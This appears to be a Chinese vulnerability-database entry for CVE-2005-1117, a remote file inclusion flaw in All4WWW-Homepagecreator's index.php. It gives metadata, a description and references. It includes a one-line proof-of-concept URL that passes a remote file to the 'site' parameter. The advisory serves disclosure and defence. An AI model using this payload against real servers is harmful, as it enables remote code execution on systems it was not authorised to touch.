All4WWW-HomePageCreator index.php 远程任意文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1108674 漏洞类型 输入验证
发布时间 2005-04-14 更新时间 2006-09-28
CVE编号 CVE-2005-1117 CNNVD-ID CNNVD-200505-496
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/25422
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200505-496
|漏洞详情
All4WWW-Homepagecreator是一款自动生成WEB页的脚本。All4WWW-Homepagecreator受远程任意文件包含漏洞影响,起因是应用程序在include()函数调用中使用用户提供的输入前无法正确的过滤这些输入。
|漏洞EXP
source: http://www.securityfocus.com/bid/13169/info

All4WWW-Homepagecreator is affected by an arbitrary remote file include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an 'include()' function call.

An attacker may leverage this issue to execute arbitrary server-side script code on an affected computer with the privileges of the Web server process. 

http://www.example.com/index.php?site=http://www.example.com/some-file
|参考资料

来源:BID
名称:13169
链接:http://www.securityfocus.com/bid/13169
来源:SECUNIA
名称:14972
链接:http://secunia.com/advisories/14972
来源:BUGTRAQ
名称:20050414All4WWW-HomepagecreatorRemoteCommandExecution
链接:http://marc.theaimsgroup.com/?l=bugtraq&m=111350434925520&w=2